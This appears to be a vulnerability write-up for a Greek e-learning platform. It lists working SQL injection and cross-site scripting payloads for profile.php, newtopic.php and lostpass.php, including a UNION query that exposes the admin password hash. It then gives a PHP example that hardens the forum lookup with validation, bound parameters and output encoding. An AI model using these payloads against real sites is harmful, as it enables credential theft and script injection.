In /modules/profile/profile.php we set
uname= <img src="\xC2\xA0javascript:javascript:alert(1)">
pass = onerror="javascript:**attack_script()**"
In /modules/phpbb/newtopic.php we set the forum variable to
forum=') union select password, 2, 3 from eclass.user where username='drunkadmin'--+
and we get the admin password in the page path:
Χαρτοφυλάκιο χρήστη » How to get hacked fast <3 » Περιοχές Συζητήσεων » pass_hash » Νέο θέμα
In the same spirit we can set forum=') union select '<script>malicious_code()</script>', 2, 3 from eclass.user where username='drunkadmin'--+
and we get a reflected XSS attack.
In /modules/auth/lostpass.php we can set
uname = <script>malicious_code()</script>
email: some@valid.mail
and execute JavaScript code.
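A sketch of how the forum lookup and breadcrumb could be hardened so the inputs above are neutralized. This is an added example, not the application's own code: the forums table, the function names and the in-memory SQLite database are assumptions made for illustration. The same output encoding applies to the reflected uname values in profile.php and lostpass.php.

```php
<?php
declare(strict_types=1);
// Hypothetical schema and function names; not the application's own code.

function forumName(PDO $db, string $rawForum): ?string
{
    // 1. Validate: a forum id is a positive integer, nothing else.
    $id = filter_var($rawForum, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Bind the value; it is never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT forum_name FROM forums WHERE forum_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : (string) $name;
}

function breadcrumb(array $parts): string
{
    // 3. Encode on output, so stored or reflected markup renders as text.
    $safe = array_map(
        fn (string $p): string => htmlspecialchars($p, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'),
        $parts
    );
    return implode(' » ', $safe);
}

// Constructed sample data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE forums (forum_id INTEGER PRIMARY KEY, forum_name TEXT)');
$db->exec("INSERT INTO forums VALUES (1, 'General <b>talk</b>')");

// The first input is a valid id; the other two are the values from this page.
$inputs = [
    '1',
    "') union select password, 2, 3 from eclass.user where username='drunkadmin'--+",
    "') union select '<script>malicious_code()</script>', 2, 3 from eclass.user where username='drunkadmin'--+",
];
foreach ($inputs as $forum) {
    $name = forumName($db, $forum);
    echo $name === null
        ? "rejected: invalid forum id\n"
        : breadcrumb(['Discussion areas', $name, 'New topic']) . "\n";
}
```

Validation alone would stop both forum payloads here, but the bound parameter and the output encoding are kept as independent layers so that a non-numeric field such as uname is still safe when echoed back.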